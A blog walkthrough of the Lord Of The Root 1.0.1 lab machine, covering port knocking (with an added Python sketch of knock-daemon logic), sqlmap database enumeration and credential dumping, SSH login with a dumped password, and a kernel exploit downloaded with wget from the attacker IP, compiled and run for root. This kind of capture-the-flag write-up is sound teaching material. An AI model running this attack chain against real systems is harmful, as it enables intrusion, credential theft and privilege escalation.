Hello everyone, in this blog I am going to post a walkthrough of Lord Of The Root 1.0.1.
This machine is for beginners.
Let’s start.

Target IP- 192.168.43.159
Attacker IP- 192.168.43.139
Let’s scan the target IP:
nmap -sC -sV -p- -Pn 192.168.43.159

There is only one port open:
22 - ssh
I tried connecting to SSH.
ssh 192.168.43.159

I tried a few default passwords but they didn’t work.
When you look at it carefully, the banner says “knock Friend To Enter” and under that it says “Easy as 1,2,3”.
Later, I got to know that there is something called “Port Knocking”: a daemon on the target watches for connection attempts to a secret sequence of closed ports and only then opens the real service port.
Click here to learn about Port Knocking.
So, let’s knock ports 1, 2, 3 in that order:
nmap -sT -r -p 1,2,3 192.168.43.159
-sT : Connect scan (a full TCP handshake attempt, which is what the knock daemon sees)
-r : Scan ports consecutively, don’t randomize (the knock only counts if the ports are hit in order)
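As an added example (not part of the original walkthrough), this is the server-side gate logic a port-knocking daemon runs on a box like this one: it tracks each source address’s progress through the secret sequence and only lets that source reach the hidden port once 1, 2, 3 were hit in order. The sequence, hidden port, timeout and the probe log are assumptions modelled on the hints above; replaying an in-order scan next to a randomised one shows why the nmap -r flag matters.

```python
from dataclasses import dataclass, field

KNOCK_SEQUENCE = (1, 2, 3)   # the "Easy as 1,2,3" hint (assumed sequence)
HIDDEN_PORT = 1337           # port that only opens after a correct knock
SEQUENCE_TIMEOUT = 5.0       # seconds allowed between knocks (assumed)


@dataclass
class KnockGate:
    sequence: tuple = KNOCK_SEQUENCE
    timeout: float = SEQUENCE_TIMEOUT
    progress: dict = field(default_factory=dict)  # src -> (next index, last ts)
    opened: set = field(default_factory=set)      # sources allowed through

    def knock(self, src: str, port: int, ts: float) -> bool:
        """Record one connection attempt; return True if the gate just opened."""
        idx, last = self.progress.get(src, (0, ts))
        if ts - last > self.timeout:
            idx = 0                                  # too slow: start over
        if port == self.sequence[idx]:
            idx += 1                                 # correct next knock
        else:
            # wrong port resets the sequence, but a fresh first knock counts
            idx = 1 if port == self.sequence[0] else 0
        if idx == len(self.sequence):
            self.opened.add(src)
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, ts)
        return False

    def allows(self, src: str, port: int) -> bool:
        """Would the firewall accept a connection from src to port?"""
        return port != HIDDEN_PORT or src in self.opened


def replay(gate: KnockGate, attempts) -> set:
    """Feed (src, port, ts) tuples; return the sources that opened the gate."""
    return {src for src, port, ts in attempts if gate.knock(src, port, ts)}


# Constructed probe log: .5 knocks in order (nmap -r), .6 in a randomised
# order (nmap's default), .7 in order but too slowly between knocks.
ATTEMPTS = [
    ("10.0.0.5", 1, 0.0), ("10.0.0.5", 2, 0.1), ("10.0.0.5", 3, 0.2),
    ("10.0.0.6", 1, 0.0), ("10.0.0.6", 3, 0.1), ("10.0.0.6", 2, 0.2),
    ("10.0.0.7", 1, 0.0), ("10.0.0.7", 2, 9.0), ("10.0.0.7", 3, 9.1),
]

if __name__ == "__main__":
    gate = KnockGate()
    print(replay(gate, ATTEMPTS))                      # {'10.0.0.5'}
    print(gate.allows("10.0.0.5", HIDDEN_PORT), gate.allows("10.0.0.6", HIDDEN_PORT))
```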

Let’s scan the target again:
nmap -sS -A -p- 192.168.43.159

OK, now we can see one more port has opened and a website is running on it:
1337 - http

It’s an image. I checked the page source but didn’t find anything.
So, I ran Nikto:
nikto -h http://192.168.43.159:1337

I found a directory, /images/.

So, we got image files.
I checked every file but didn’t get anything.
Next I thought of checking /robots.txt.

It has an image.
I checked the page source and found a Base64-encoded string.

I decoded it twice (the first decode produced another Base64 string).


So, we got a directory: /978345210/index.php.

We got a login page. I tried a few usernames and passwords but couldn’t log in.
So I used sqlmap:
sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms --dbs --risk=3 --level=5 --threads=4 --batch

So, there are 4 databases available.
Next, I checked the tables in the Webapp database:
sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms -D Webapp --tables

We got the table Users.
Let’s check for columns:
sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms -D Webapp -T Users --columns

We got id, password and username.
Let’s dump them:
sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms -D Webapp -T Users -C id,password,username --dump

OK, we got some usernames and passwords.
I tried to log in on the web page but failed.
As SSH is running, I tried to log in there instead.
Only one username and password worked, i.e.
smeagol:MyPreciousR00t
ssh smeagol@192.168.43.159
I got a shell.

Now, I checked the Linux kernel version:
uname -a

I checked whether any exploit was available for that version and found one.

I downloaded the exploit to my Kali machine and started an HTTP server there:
python -m SimpleHTTPServer 8080
After this, I moved into the tmp folder in the shell and downloaded the exploit using wget (from the attacker IP, where the HTTP server is listening).
Then I compiled and executed it.
cd /tmp
wget http://192.168.43.139:8080/39166.c
gcc 39166.c -o exploit
./exploit

Here, I got ROOT!!!
Writer: Anudeep is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.